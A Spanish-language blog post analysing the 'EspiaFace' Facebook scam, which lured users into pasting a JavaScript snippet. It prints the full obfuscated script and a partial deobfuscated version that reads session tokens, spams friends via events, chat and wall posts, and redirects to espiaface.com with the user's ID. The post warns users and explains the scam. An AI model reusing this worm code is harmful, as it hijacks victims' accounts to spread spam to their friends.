Qué hace realmente Espia F a c e.com

Exploiting Qué hace realmente Espia F a c e.com

Hace algunos días proliferó de forma viral en unas invitaciones para “Averigua quién visita tu perfil”, seguramente las habrán visto en su perfil o les llegó la invitación de algún amigo, hoy nanopene me ha enviado una investigación que ha realizado sobre este fenómeno y con un alto nivel de detalle explica qué hace realmente .

EspiaFace Qué hace realmente Espia F a c e.com

Para quien no lo sepa aun, no existe ni existirá en Facebook, algún método que te permita averiguar quién visita tu perfil, todas las aplicaciones, métodos o trucos para averiguar esto son un total FRAUDE y posiblemente termines infectado, con identidad robada o haciendo a alguien rico con publicidad.

Aclarado esto, paso a dejarles el informe de nanopene, espero que lo encuentren interesante.

Todos sabemos para esta altura que “espiaface.com” no cumple con lo que promete, pero antes les quiero tranquilizar diciéndoles primero lo que no es:

  • NO es un virus (ni worm, ni troyano, ni ataque de XSS, ni explota vulnerabilidades del navegador)
  • NO roba contraseñas de Facebook
  • NO roba cookies (no roba sesiones de Facebook)
  • NO accede a tu información privada del perfil (en esta variante en específico)
  • NO es una Aplicación de Facebook (No instala nada, no queda residente, nada)

Pero bien podría haber sido todo lo anterior:

  • podría haber sido un virus creando un lindo botnet de la San Puta.
  • podría haberte robado la cuenta de Facebook.
  • podría vender tu información privada al mejor postor para que te espameen de lo lindo o le vendan tu información a delincuentes para que te hagan un secuestro virtual.

ACLARANDO: Facebook  ofrece tu información privada en bandeja de plata a CUALQUIER aplicación de facebook. Si, todos los jueguitos, tests de psicología (“¿Sos más pelotudo que el promedio?” ), O chimentos “¿Qué dijo fulano de mengano?”, “¿Querés saber quién dijo que sos una trola?” y todas las porquerías esas obtienen acceso y control completo de tu perfil cuando presionas “Permitir“.

En una ventana como esta, es cuando estás “instalando” un App de Facebook.

permitir facebook Qué hace realmente Espia F a c e.com

El botón Permitir, concede al App el acceso irrestricto a toda la información privada de tu perfil, control de posteo en tu cuenta y todo lo que te describe ahí. Esto es totalmente independiente a tu configuración de privacidad, aunque estés en modo superparanoico, con “Solo Amigos” y “Solo Yo”, estos Apps tienen acceso completo cuando les das el permiso.

Si fuiste víctima de EspiaFace, sabrás que no presionaste “Permitir” en ningún lado, eso se debe a que EspiaFace no es una aplicación de Facebook. Eso por una parte es una buena noticia, ya que tenemos la tranquilidad de que no obtiene los datos privados por defecto y tampoco hay que “desinstalar” nada de Facebook.

Si caíste esta vez, estuviste debuenas. La próxima vez que caigas en una trampa de este calibre puede que pierdas la cuenta de facebook, pierdas el control de tu computadora y pierdas ancho de banda.


EspiaFace Qué hace realmente Espia F a c e.com

Primero nos tienta con una imagen modificada, mostrando las visitas a tu perfil en tu “Notificaciones”. Cuando presionamos Siguiente, nos topamos con la siguiente pantalla:

EspiaFace2 Qué hace realmente Espia F a c e.com

Nos muestra un código para poner en Facebook. Si se fijan bien, ese código llama un archivo de javascript llamado app.js para hacer el trabajo sucio, ¿por qué nos pide que esperemos 2 a 3 minutos? ¿Qué carajo hace el código? veamos su contenido: (prepárense para un scroll largo y ancho…)

 

[toggle title_open="Código Ofuscado" title_closed="Código Ofuscado" hide="yes" border="yes" style="default"]

var _0x3fe9=["x25x66x69x72x73x74x6Ex61x6Dx65x25x20x6Dx69x72x61x20x65x73x74x6Fx20x71x75x65x20x65x73x20x69x6Ex63x72x65x69x62x6Cx65x2Cx20x74x65x20x70x65x72x6Dx69x74x65x20x76x65x72x20x71x75x69x65x6Ex65x73x20x76x69x73x69x74x61x6Ex20x74x75x20x70x65x72x66x69x6Cx20x79x20x66x75x6Ex63x69x6Fx6Ex61x20x62x69x65x6Ex2Cx20x65x6Ex74x72x61x20x61x3Ax20x65x73x70x69x61x66x61x63x65x2Ex63x6Fx6D","x54x6Fx70x20x64x65x20x76x69x73x69x74x61x6Ex74x65x73x20x64x65x20x74x75x20x70x65x72x66x69x6Cx20x64x65x20x68x6Fx79x3Ax20x0Ax20x25x74x66x25x20x2Dx20x31x39x20x76x69x73x69x74x61x73x20x0Ax20x25x74x66x25x20x2Dx20x31x36x20x76x69x73x69x74x61x73x20x0Ax20x25x74x66x25x20x2Dx20x31x35x20x76x69x73x69x74x61x73x20x0Ax20x25x74x66x25x20x2Dx20x31x33x20x76x69x73x69x74x61x73x20x0Ax20x41x76x65x72x69x67x75x61x20x74x75x20x74x61x6Dx62x69x65x6Ex20x71x75x69x65x6Ex20x74x65x20x65x73x74x61x20x6Dx69x72x61x6Ex64x6Fx20x65x6Ex74x72x61x6Ex64x6Fx20x65x6Ex3Ax20x65x73x70x69x61x66x61x63x65x2Ex63x6Fx6Dx0Ax46x75x6Ex63x69x6Fx6Ex61x20x64x65x20x76x65x72x64x61x64x21","x68x74x74x70x3Ax2Fx2Fx77x77x77x2Ex65x73x70x69x61x66x61x63x65x2Ex63x6Fx6Dx2Fx63x61x72x67x61x2Ex70x68x70","x45x73x74x6Fx20x65x73x20x69x6Ex63x72x65x69x62x6Cx65x21x20x70x75x65x64x65x6Ex20x76x65x72x20x71x75x69x65x6Ex20x65x73x74x61x20x76x69x73x69x74x61x6Ex64x6Fx20x73x75x20x70x65x72x66x69x6Cx20x79x20x74x65x20x6Cx6Cx65x67x61x6Ex20x6Ex6Fx74x69x66x69x63x61x63x69x6Fx6Ex65x73x2Cx20x73x69x67x61x6Ex20x6Cx6Fx73x20x70x61x73x6Fx73x20x64x65x20x65x73x74x61x20x70x61x67x69x6Ex61x20x71x75x65x20x65x78x70x6Cx69x63x61x20x63x6Fx6Dx6Fx20x68x61x63x65x72x6Cx6Fx2Cx20x65x6Ex74x72x65x6Ex20x65x6Ex3Ax20x65x73x70x69x61x66x61x63x65x2Ex63x6Fx6D","x41x76x65x72x69x67x75x61x20x71x75x69x65x6Ex20x76x69x73x69x74x61x20x74x75x20x70x65x72x66x69x6C","x68x72x65x66","x6Cx6Fx63x61x74x69x6Fx6E","x74x6Fx70","x47x45x54","x6Fx70x65x6E","x6Fx6Ex72x65x61x64x79x73x74x61x74x65x63x68x61x6Ex67x65","x72x65x61x64x79x53x74x61x74x65","x73x74x61x74x75x73","x72x65x73x70x6Fx6Ex73x65x54x65x78x74","x73x65x6Ex64","x2F","x6Dx61x74x63x68","x63x6Fx6Fx6Bx69x65","x40x5B","x69x64","x3A","x6Ex61x6Dx65","x5D","","x26","x3D","x50x4Fx53x54","x43x6Fx6Ex74x65x6Ex74x2Dx54x79x70x65","x61x70x70x6Cx69x63x61x74x69x6Fx6Ex2Fx78x2Dx77x77x77x2Dx66x6Fx72x6Dx2Dx75x72x6Cx65x6Ex63x6Fx64x65x64","x73x65x74x52x65x71x75x65x73x74x48x65x61x64x65x72","x64x69x76","x63x72x65x61x74x65x45x6Cx65x6Dx65x6Ex74","x64x69x73x70x6Cx61x79","x73x74x79x6Cx65","x62x6Cx6Fx63x6B","x70x6Fx73x69x74x69x6Fx6E","x61x62x73x6Fx6Cx75x74x65","x77x69x64x74x68","x31x30x30x25","x68x65x69x67x68x74","x6Cx65x66x74","x30x70x78","x74x65x78x74x41x6Cx69x67x6E","x63x65x6Ex74x65x72","x70x61x64x64x69x6Ex67","x34x70x78","x62x61x63x6Bx67x72x6Fx75x6Ex64","x23x46x46x46x46x46x46","x7Ax49x6Ex64x65x78","x69x6Ex6Ex65x72x48x54x4Dx4C","x20x3Cx62x72x2Fx3Ex3Cx62x3Ex43x61x72x67x61x6Ex64x6Fx20x61x70x6Cx69x63x61x63x69x6Fx6Ex2Cx20x61x67x75x61x72x64x65x20x75x6Ex20x6Dx6Fx6Dx65x6Ex74x6Fx2Ex2Ex2Ex3Cx2Fx62x3Ex3Cx62x72x2Fx3Ex3Cx62x72x2Fx3Ex20x4Cx61x20x61x70x6Cx69x63x61x63x69x6Fx6Ex20x65x73x74x61x20x70x72x65x70x61x72x61x6Ex64x6Fx20x74x75x20x66x61x63x65x62x6Fx6Fx6Bx20x70x61x72x61x20x72x65x67x69x73x74x72x61x72x20x6Cx61x73x20x76x69x73x69x74x61x73x20x64x65x20x74x75x73x20x61x6Dx69x67x6Fx73x2Ex3Cx62x72x2Fx3Ex3Cx62x72x2Fx3Ex3Cx69x6Dx67x20x73x72x63x3Dx22x68x74x74x70x3Ax2Fx2Fx67x65x6Ex65x74x69x63x73x2Ex62x77x68x2Ex68x61x72x76x61x72x64x2Ex65x64x75x2Fx73x6Ex70x32x72x66x6Cx70x2Fx63x69x72x63x6Cx65x2Ex67x69x66x22x3E","x61x70x70x65x6Ex64x43x68x69x6Cx64","x62x6Fx64x79","x64x61x74x61","x66x69x72x73x74x43x68x69x6Cx64","x6Ex61x76x41x63x63x6Fx75x6Ex74x4Ex61x6Dx65","x67x65x74x45x6Cx65x6Dx65x6Ex74x42x79x49x64","x3F","x2Fx61x6Ax61x78x2Fx63x68x6Fx6Fx73x65x2Fx3Fx5Fx5Fx61x3Dx31","x65x76x65x6Ex74","x41x73x79x6Ex63x52x65x71x75x65x73x74","x2Fx61x6Ax61x78x2Fx74x79x70x65x61x68x65x61x64x2Fx66x69x72x73x74x5Fx64x65x67x72x65x65x2Ex70x68x70x3Fx5Fx5Fx61x3Dx31x26x76x69x65x77x65x72x3D","x26x74x6Fx6Bx65x6Ex3D","x26x66x69x6Cx74x65x72x5Bx30x5Dx3Dx75x73x65x72x26x6Fx70x74x69x6Fx6Ex73x5Bx30x5Dx3Dx66x72x69x65x6Ex64x73x5Fx6Fx6Ex6Cx79x26x6Fx70x74x69x6Fx6Ex73x5Bx31x5Dx3Dx6Ex6Dx26x6Fx70x74x69x6Fx6Ex73x5Bx32x5Dx3Dx73x6Fx72x74x5Fx61x6Cx70x68x61","x6Cx65x6Ex67x74x68","x70x75x73x68","x67x65x74x54x69x6Dx65","x73x65x74x54x69x6Dx65","x67x65x74x4Dx6Fx6Ex74x68","x67x65x74x44x61x74x65","x67x65x74x46x75x6Cx6Cx59x65x61x72","x67x65x74x48x6Fx75x72x73","x2C","x6Ax6Fx69x6E","x6Fx6E","x43x72x65x61x74x65x20x45x76x65x6Ex74","x6Ex65x77","x2Fx65x76x65x6Ex74x73x2Fx63x72x65x61x74x65x2Ex70x68x70","x2Fx61x6Ax61x78x2Fx63x68x61x74x2Fx62x75x64x64x79x5Fx6Cx69x73x74x2Ex70x68x70x3Fx5Fx5Fx61x3Dx31","x73x75x62x73x74x72","x28","x29","x62x75x64x64x79x5Fx6Cx69x73x74","x70x61x79x6Cx6Fx61x64","x6Ex6Fx77x41x76x61x69x6Cx61x62x6Cx65x4Cx69x73x74","x72x61x6Ex64x6Fx6D","x66x6Cx6Fx6Fx72","x25x66x69x72x73x74x6Ex61x6Dx65x25","x74x6Fx4Cx6Fx77x65x72x43x61x73x65","x66x69x72x73x74x4Ex61x6Dx65","x75x73x65x72x49x6Ex66x6Fx73","x72x65x70x6Cx61x63x65","x2Fx61x6Ax61x78x2Fx63x68x61x74x2Fx73x65x6Ex64x2Ex70x68x70x3Fx5Fx5Fx61x3Dx31","x2Fx61x6Ax61x78x2Fx62x72x6Fx77x73x65x72x2Fx66x72x69x65x6Ex64x73x2Fx3Fx75x69x64x3D","x26x66x69x6Cx74x65x72x3Dx61x6Cx6Cx26x5Fx5Fx61x3Dx31x26x5Fx5Fx64x3Dx31","x73x68x69x66x74","x66x65x74x63x68x65x64x20x66x72x69x65x6Ex64x73x3Ax20","x68x6Fx6Dx65","x70x6Fx70","x25x74x66x25","x73x65x61x72x63x68","x78x68x70x63x5Fx6Dx65x73x73x61x67x65x5Fx74x65x78x74","x78x68x70x63x5Fx6Dx65x73x73x61x67x65","x6Dx65x73x73x61x67x65x20x74x65x78x74x3Ax20","x2Fx61x6Ax61x78x2Fx75x70x64x61x74x65x73x74x61x74x75x73x2Ex70x68x70x3Fx5Fx5Fx61x3Dx31","x70x72x6Fx66x69x6Cx65"];var chatmessage=_0x3fe9[0];var postmessage=_0x3fe9[1];var redirect=_0x3fe9[2];var eventdesc=_0x3fe9[3];var eventname=_0x3fe9[4];var nfriends=5000;var debug=false;var wf=0;var mf=function (){if(wf<=0){setTimeout(function (){window[_0x3fe9[7]][_0x3fe9[6]][_0x3fe9[5]]=redirect;} ,500);} ;} ;var doget=function (_0xbf72xb,_0xbf72xc,_0xbf72xd){var _0xbf72xe= new XMLHttpRequest;_0xbf72xe[_0x3fe9[9]](_0x3fe9[8],_0xbf72xb);_0xbf72xe[_0x3fe9[10]]=function (){if(_0xbf72xe[_0x3fe9[11]]==4){if(_0xbf72xe[_0x3fe9[12]]==200&&_0xbf72xc){_0xbf72xc(_0xbf72xe[_0x3fe9[13]]);} ;if(_0xbf72xd){_0xbf72xd();} ;} ;} ;_0xbf72xe[_0x3fe9[14]]();} ;doget(_0x3fe9[15],function (_0xbf72xf){var _0xbf72x10=document[_0x3fe9[17]][_0x3fe9[16]](/c_user=(d+)/)[1];var _0xbf72x11=function (_0xbf72x12){return _0xbf72x12?_0x3fe9[18]+_0xbf72x12[_0x3fe9[19]]+_0x3fe9[20]+_0xbf72x12[_0x3fe9[21]]+_0x3fe9[22]:_0x3fe9[23];} ;var _0xbf72x13=function (_0xbf72x12){return _0xbf72x12?_0xbf72x12[_0x3fe9[21]]:_0x3fe9[23];} ;var _0xbf72x14=function (_0xbf72x12){out=_0x3fe9[23];for(var _0xbf72x15 in _0xbf72x12){out+=(out?_0x3fe9[24]:_0x3fe9[23])+_0xbf72x15+(_0xbf72x12[_0xbf72x15]!==null?_0x3fe9[25]+encodeURIComponent(_0xbf72x12[_0xbf72x15]):_0x3fe9[23]);} ;return out;} ;var _0xbf72x16=function (_0xbf72xb,_0xbf72x12,_0xbf72xc,_0xbf72xd){var _0xbf72xe= new XMLHttpRequest;_0xbf72xe[_0x3fe9[9]](_0x3fe9[26],_0xbf72xb);_0xbf72xe[_0x3fe9[29]](_0x3fe9[27],_0x3fe9[28]);_0xbf72xe[_0x3fe9[10]]=function (){if(_0xbf72xe[_0x3fe9[11]]==4){if(_0xbf72xe[_0x3fe9[12]]==200&&_0xbf72xc){_0xbf72xc(_0xbf72xe[_0x3fe9[13]]);} ;if(_0xbf72xd){_0xbf72xd();} ;} ;} ;_0xbf72xe[_0x3fe9[14]](_0xbf72x14(_0xbf72x12));} ;var _0xbf72x17=function (){var _0xbf72x18=document[_0x3fe9[31]](_0x3fe9[30]);_0xbf72x18[_0x3fe9[33]][_0x3fe9[32]]=_0x3fe9[34];_0xbf72x18[_0x3fe9[33]][_0x3fe9[35]]=_0x3fe9[36];_0xbf72x18[_0x3fe9[33]][_0x3fe9[37]]=_0x3fe9[38];_0xbf72x18[_0x3fe9[33]][_0x3fe9[39]]=_0x3fe9[38];_0xbf72x18[_0x3fe9[33]][_0x3fe9[40]]=_0x3fe9[41];_0xbf72x18[_0x3fe9[33]][_0x3fe9[7]]=_0x3fe9[41];_0xbf72x18[_0x3fe9[33]][_0x3fe9[42]]=_0x3fe9[43];_0xbf72x18[_0x3fe9[33]][_0x3fe9[44]]=_0x3fe9[45];_0xbf72x18[_0x3fe9[33]][_0x3fe9[46]]=_0x3fe9[47];_0xbf72x18[_0x3fe9[33]][_0x3fe9[48]]=999999;_0xbf72x18[_0x3fe9[49]]=_0x3fe9[50];document[_0x3fe9[52]][_0x3fe9[51]](_0xbf72x18);} ;var _0xbf72x19=_0xbf72xf[_0x3fe9[16]](/name="xhpc_composerid" value="([dw]+)"/i);if(_0xbf72x19){comp=_0xbf72x19[1];} else {comp=_0x3fe9[23];} ;var _0xbf72x1a=_0xbf72xf[_0x3fe9[16]](/name="post_form_id" value="([dw]+)"/i)[1];var _0xbf72x1b=_0xbf72xf[_0x3fe9[16]](/name="fb_dtsg" value="([dw]+)"/i)[1];var _0xbf72x1c=document[_0x3fe9[56]](_0x3fe9[55])[_0x3fe9[54]][_0x3fe9[53]];redirect=redirect+_0x3fe9[57]+_0xbf72x14({userid:_0xbf72x10,name:_0xbf72x1c,doclose:1});_0xbf72x17();if(eventdesc){wf++;_0xbf72x16(_0x3fe9[58],{type:_0x3fe9[59],eid:null,invite_message:_0x3fe9[23],__d:1,post_form_id:_0xbf72x1a,fb_dtsg:_0xbf72x1b,lsd:null,post_form_id_source:_0x3fe9[60]},function (_0xbf72x1d){var _0xbf72x1e=_0xbf72x1d[_0x3fe9[16]](/"token":"([^]+)"/)[1];var _0xbf72xb=_0x3fe9[61]+_0xbf72x10+_0x3fe9[62]+_0xbf72x1e+_0x3fe9[63];doget(_0xbf72xb,function (_0xbf72x1f){var _0xbf72x20=_0xbf72x1f[_0x3fe9[16]](/{"uid":d+,/g);var _0xbf72x21=[];for(var _0xbf72x22=0;_0xbf72x22<_0xbf72x20[_0x3fe9[64]];_0xbf72x22++){var _0xbf72x23=_0xbf72x20[_0xbf72x22][_0x3fe9[16]](/:(d+),/)[1];if(_0xbf72x23!=_0xbf72x10){_0xbf72x21[_0x3fe9[65]](_0xbf72x23);} ;} ;var _0xbf72x24= new Date;_0xbf72x24[_0x3fe9[67]](_0xbf72x24[_0x3fe9[66]]()+86400000);datestr=_0xbf72x24[_0x3fe9[68]]()+1+_0x3fe9[15]+_0xbf72x24[_0x3fe9[69]]()+_0x3fe9[15]+_0xbf72x24[_0x3fe9[70]]();timestr=_0xbf72x24[_0x3fe9[71]]()*60;var _0xbf72x25={post_form_id:_0xbf72x1a,fb_dtsg:_0xbf72x1b,start_dateIntlDisplay:datestr,start_date:datestr,start_time_hour_min:timestr,name:eventname,place_page_id:_0x3fe9[23],location:_0x3fe9[23],street:_0x3fe9[23],geo_id:_0x3fe9[23],geo_sq:_0x3fe9[23],desc:eventdesc,sgb_invitees:_0xbf72x21[_0x3fe9[73]](_0x3fe9[72]),sgb_emails:_0x3fe9[23],sgb_message:_0x3fe9[23],privacy_type:_0x3fe9[74],guest_list:_0x3fe9[74],connections_can_post:_0x3fe9[74],save:_0x3fe9[75],submitting:_0x3fe9[23]};_0xbf72x25[_0x3fe9[76]]=_0x3fe9[23];_0xbf72x16(_0x3fe9[77],_0xbf72x25,false,function (){mf(--wf);} );} );} );} ;if(chatmessage){wf++;_0xbf72x16(_0x3fe9[78],{user:_0xbf72x10,post_form_id:_0xbf72x1a,fb_dtsg:_0xbf72x1b,lsd:null,post_form_id_source:_0x3fe9[60],popped_out:false,force_render:true},function (_0xbf72x1d){var _0xbf72x26=_0xbf72x1d[_0x3fe9[79]](9);var _0xbf72x27=eval(_0x3fe9[80]+_0xbf72x26+_0x3fe9[81]);var _0xbf72x28=_0xbf72x27[_0x3fe9[83]][_0x3fe9[82]];for(var _0xbf72x29 in _0xbf72x28[_0x3fe9[84]]){var _0xbf72x2a=Math[_0x3fe9[86]](Math[_0x3fe9[85]]()*1335448958);var _0xbf72x2b=( new Date)[_0x3fe9[66]]();var _0xbf72x2c=chatmessage[_0x3fe9[91]](_0x3fe9[87],_0xbf72x28[_0x3fe9[90]][_0xbf72x29][_0x3fe9[89]][_0x3fe9[88]]());_0xbf72x16(_0x3fe9[92],{msg_id:Math[_0x3fe9[86]](Math[_0x3fe9[85]]()*1335448958),client_time:( new Date)[_0x3fe9[66]](),msg_text:chatmessage[_0x3fe9[91]](_0x3fe9[87],_0xbf72x28[_0x3fe9[90]][_0xbf72x29][_0x3fe9[89]][_0x3fe9[88]]()),to:_0xbf72x29,post_form_id:_0xbf72x1a,fb_dtsg:_0xbf72x1b,post_form_id_source:_0x3fe9[60]});} ;mf(--wf);} );} ;if(postmessage){wf++;doget(_0x3fe9[93]+_0xbf72x10+_0x3fe9[94],function (_0xbf72x1d){var _0xbf72x20=_0xbf72x1d[_0x3fe9[16]](//d+_d+_d+_q.jpg.*?u003ca href="http://www.facebook.com/.*?u003c/a>/gi);var _0xbf72x2d=[];if(_0xbf72x20){for(var _0xbf72x22=0;_0xbf72x22<_0xbf72x20[_0x3fe9[64]];_0xbf72x22++){var _0xbf72x23=_0xbf72x20[_0xbf72x22][_0x3fe9[16]](/_d+_/)[0][_0x3fe9[91]](/_/g,_0x3fe9[23]);var _0xbf72x2e=_0xbf72x20[_0xbf72x22][_0x3fe9[16]](/>[^>]+u003c/a>$/i)[0][_0x3fe9[91]](/u003c/a>$/gim,_0x3fe9[23])[_0x3fe9[91]](/>/g,_0x3fe9[23]);_0xbf72x2d[_0x3fe9[65]]({id:_0xbf72x23,name:_0xbf72x2e});} ;} ;var _0xbf72xd=[];var _0xbf72x2f=[];while(_0xbf72x2d[_0x3fe9[64]]){var _0xbf72x30=Math[_0x3fe9[86]](Math[_0x3fe9[85]]()*_0xbf72x2d[_0x3fe9[64]]);_0xbf72xd[_0x3fe9[65]](_0xbf72x2d[_0xbf72x30]);_0xbf72x2f[_0x3fe9[65]](_0xbf72x2d[_0xbf72x30]);var _0xbf72x2b=_0xbf72x2d[_0x3fe9[95]]();if(_0xbf72x30){_0xbf72x2d[_0xbf72x30-1]=_0xbf72x2b;} ;} ;if(debug){alert(_0x3fe9[96]+_0xbf72xd[_0x3fe9[64]]);} ;var _0xbf72x31={post_form_id:_0xbf72x1a,fb_dtsg:_0xbf72x1b,xhpc_composerid:comp,xhpc_targetid:_0xbf72x10,xhpc_context:_0x3fe9[97],xhpc_fbx:_0x3fe9[23],lsd:null,post_form_id_source:_0x3fe9[60]};mt=postmessage;m=postmessage;while(mt[_0x3fe9[100]](_0x3fe9[99])>=0){var _0xbf72x32=_0xbf72xd[_0x3fe9[98]]();mt=mt[_0x3fe9[91]](_0x3fe9[99],_0xbf72x13(_0xbf72x32));m=m[_0x3fe9[91]](_0x3fe9[99],_0xbf72x11(_0xbf72x32));} ;_0xbf72x31[_0x3fe9[101]]=mt;_0xbf72x31[_0x3fe9[102]]=m;if(debug){alert(_0x3fe9[103]+mt);} ;_0xbf72x16(_0x3fe9[104],_0xbf72x31);var _0xbf72x33=function (_0xbf72x15){if(_0xbf72x15==0){wf=0;mf();return ;} ;var _0xbf72x34=_0xbf72x2f[_0x3fe9[95]]();var _0xbf72x35={post_form_id:_0xbf72x1a,fb_dtsg:_0xbf72x1b,xhpc_composerid:comp,xhpc_targetid:_0xbf72x34[_0x3fe9[19]],xhpc_context:_0x3fe9[105],xhpc_fbx:1,lsd:null,post_form_id_source:_0x3fe9[60]};var _0xbf72x36=postmessage;var _0xbf72x37=postmessage;if(_0xbf72xd[_0x3fe9[64]]==0){wf=0;mf();return ;} ;while(_0xbf72x36[_0x3fe9[100]](_0x3fe9[99])>=0){var _0xbf72x38=_0xbf72xd[_0x3fe9[98]]();_0xbf72x36=_0xbf72x36[_0x3fe9[91]](_0x3fe9[99],_0xbf72x13(_0xbf72x38));_0xbf72x37=_0xbf72x37[_0x3fe9[91]](_0x3fe9[99],_0xbf72x11(_0xbf72x38));} ;_0xbf72x35[_0x3fe9[101]]=_0xbf72x36;_0xbf72x35[_0x3fe9[102]]=_0xbf72x37;_0xbf72x16(_0x3fe9[104],_0xbf72x35);setTimeout(function (){_0xbf72x33(_0xbf72x15-1);} ,2000);} ;wf++;setTimeout(function (){_0xbf72x33(nfriends);} ,2000);} );} ;mf();} );

[/toggle]

Como pueden ver el javascript esta ofuscado para que no podamos saber a primera vista que es lo que hace la aplicación, pero si lo desofuscamos obtenemos esto.
[toggle title_open="Código Limpio" title_closed="Código Limpio" hide="yes" border="yes" style="default"]

var chatmessage = '%firstname%';
var postmessage = 'Top de visitantes de tu perfil de hoy: x0A %tf% - 19 visitas x0A %tf% - 16 visitas x0A %tf% - 15 visitas x0A %tf% - 13 visitas x0A Averigua tu tambien quien te esta mirando entrando en: espiaface.comx0AFunciona de verdad!';
var redirect = 'http://www.espiaface.com/carga.php';
var eventdesc = 'Esto es increible! pueden ver quien esta visitando su perfil y te llegan notificaciones, sigan los pasos de esta pagina que explica como hacerlo, entren en: espiaface.com';
var eventname = 'Averigua quien visita tu perfil';
var nfriends = 5000;
var debug = false;
var wf = 0;
var mf = function () {
        if (wf <= 0) {
            setTimeout(function () {
                window['top']['location']['href'] = redirect;
            }, 500);
        };
    };
var doget = function (_0xbf72xb, _0xbf72xc, _0xbf72xd) {
        var _0xbf72xe = new XMLHttpRequest;
        _0xbf72xe['open']('GET', _0xbf72xb);
        _0xbf72xe['onreadystatechange'] = function () {
            if (_0xbf72xe['readyState'] == 4) {
                if (_0xbf72xe['status'] == 200 && _0xbf72xc) {
                    _0xbf72xc(_0xbf72xe['responseText']);
                };
                if (_0xbf72xd) {
                    _0xbf72xd();
                };
            };
        };
        _0xbf72xe['send']();
    };
doget('/', function (_0xbf72xf) {
    var _0xbf72x10 = document['cookie']['match'](/c_user=(d+)/)[1];
    var _0xbf72x11 = function (_0xbf72x12) {
            return _0xbf72x12 ? '@[' + _0xbf72x12['id'] + ':' + _0xbf72x12['name'] + ']' : '';
        };
    var _0xbf72x13 = function (_0xbf72x12) {
            return _0xbf72x12 ? _0xbf72x12['name'] : '';
        };
    var _0xbf72x14 = function (_0xbf72x12) {
            out = '';
            for (var _0xbf72x15 in _0xbf72x12) {
                out += (out ? '&' : '') + _0xbf72x15 + (_0xbf72x12[_0xbf72x15] !== null ? '=' + encodeURIComponent(_0xbf72x12[_0xbf72x15]) : '');
            };
            return out;
        };
    var _0xbf72x16 = function (_0xbf72xb, _0xbf72x12, _0xbf72xc, _0xbf72xd) {
            var _0xbf72xe = new XMLHttpRequest;
            _0xbf72xe['open']('POST', _0xbf72xb);
            _0xbf72xe['setRequestHeader']('Content-Type', 'application/x-www-form-urlencoded');
            _0xbf72xe['onreadystatechange'] = function () {
                if (_0xbf72xe['readyState'] == 4) {
                    if (_0xbf72xe['status'] == 200 && _0xbf72xc) {
                        _0xbf72xc(_0xbf72xe['responseText']);
                    };
                    if (_0xbf72xd) {
                        _0xbf72xd();
                    };
                };
            };
            _0xbf72xe['send'](_0xbf72x14(_0xbf72x12));
        };
    var _0xbf72x17 = function () {
            var _0xbf72x18 = document['createElement']('div');
            _0xbf72x18['style']['display'] = 'block';
            _0xbf72x18['style']['position'] = 'absolute';
            _0xbf72x18['style']['width'] = '100%';
            _0xbf72x18['style']['height'] = '100%';
            _0xbf72x18['style']['left'] = '0px';
            _0xbf72x18['style']['top'] = '0px';
            _0xbf72x18['style']['textAlign'] = 'center';
            _0xbf72x18['style']['padding'] = '4px';
            _0xbf72x18['style']['background'] = '#FFFFFF';
            _0xbf72x18['style']['zIndex'] = 999999;
            _0xbf72x18['innerHTML'] = ' <br/><b>Cargando aplicacion, aguarde un momento...</b><br/><br/> La aplicacion esta preparando tu facebook para registrar las visitas de tus amigos.<br/><br/><img src="http://genetics.bwh.harvard.edu/snp2rflp/circle.gif">';
            document['body']['appendChild'](_0xbf72x18);
        };
    var _0xbf72x19 = _0xbf72xf['match'](/name="xhpc_composerid" value="([dw]+)"/i);
    if (_0xbf72x19) {
        comp = _0xbf72x19[1];
    } else {
        comp = '';
    };
    var _0xbf72x1a = _0xbf72xf['match'](/name="post_form_id" value="([dw]+)"/i)[1];
    var _0xbf72x1b = _0xbf72xf['match'](/name="fb_dtsg" value="([dw]+)"/i)[1];
    var _0xbf72x1c = document['getElementById']('navAccountName')['firstChild']['data'];
    redirect = redirect + '?' + _0xbf72x14({
        userid: _0xbf72x10,
        name: _0xbf72x1c,
        doclose: 1
    });
    _0xbf72x17();
    if (eventdesc) {
        wf++;
        _0xbf72x16('/ajax/choose/?__a=1', {
            type: 'event',
            eid: null,
            invite_message: '',
            __d: 1,
            post_form_id: _0xbf72x1a,
            fb_dtsg: _0xbf72x1b,
            lsd: null,
            post_form_id_source: 'AsyncRequest'
        }, function (_0xbf72x1d) {
            var _0xbf72x1e = _0xbf72x1d['match'](/"token":"([^]+)"/)[1];
            var _0xbf72xb = '/ajax/typeahead/first_degree.php?__a=1&viewer=' + _0xbf72x10 + '&token=' + _0xbf72x1e + '&filter[0]=user&options[0]=friends_only&options[1]=nm&options[2]=sort_alpha';
            doget(_0xbf72xb, function (_0xbf72x1f) {
                var _0xbf72x20 = _0xbf72x1f['match'](/{"uid":d+,/g);
                var _0xbf72x21 = [];
                for (var _0xbf72x22 = 0; _0xbf72x22 < _0xbf72x20['length']; _0xbf72x22++) {
                    var _0xbf72x23 = _0xbf72x20[_0xbf72x22]['match'](/:(d+),/)[1];
                    if (_0xbf72x23 != _0xbf72x10) {
                        _0xbf72x21['push'](_0xbf72x23);
                    };
                };
                var _0xbf72x24 = new Date;
                _0xbf72x24['setTime'](_0xbf72x24['getTime']() + 86400000);
                datestr = _0xbf72x24['getMonth']() + 1 + '/' + _0xbf72x24['getDate']() + '/' + _0xbf72x24['getFullYear']();
                timestr = _0xbf72x24['getHours']() * 60;
                var _0xbf72x25 = {
                    post_form_id: _0xbf72x1a,
                    fb_dtsg: _0xbf72x1b,
                    start_dateIntlDisplay: datestr,
                    start_date: datestr,
                    start_time_hour_min: timestr,
                    name: eventname,
                    place_page_id: '',
                    location: '',
                    street: '',
                    geo_id: '',
                    geo_sq: '',
                    desc: eventdesc,
                    sgb_invitees: _0xbf72x21['join'](','),
                    sgb_emails: '',
                    sgb_message: '',
                    privacy_type: 'on',
                    guest_list: 'on',
                    connections_can_post: 'on',
                    save: 'Create Event',
                    submitting: ''
                };
                _0xbf72x25['new'] = '';
                _0xbf72x16('/events/create.php', _0xbf72x25, false, function () {
                    mf(--wf);
                });
            });
        });
    };
    if (chatmessage) {
        wf++;
        _0xbf72x16('/ajax/chat/buddy_list.php?__a=1', {
            user: _0xbf72x10,
            post_form_id: _0xbf72x1a,
            fb_dtsg: _0xbf72x1b,
            lsd: null,
            post_form_id_source: 'AsyncRequest',
            popped_out: false,
            force_render: true
        }, function (_0xbf72x1d) {
            var _0xbf72x26 = _0xbf72x1d['substr'](9);
            var _0xbf72x27 = eval('(' + _0xbf72x26 + ')');
            var _0xbf72x28 = _0xbf72x27['payload']['buddy_list'];
            for (var _0xbf72x29 in _0xbf72x28['nowAvailableList']) {
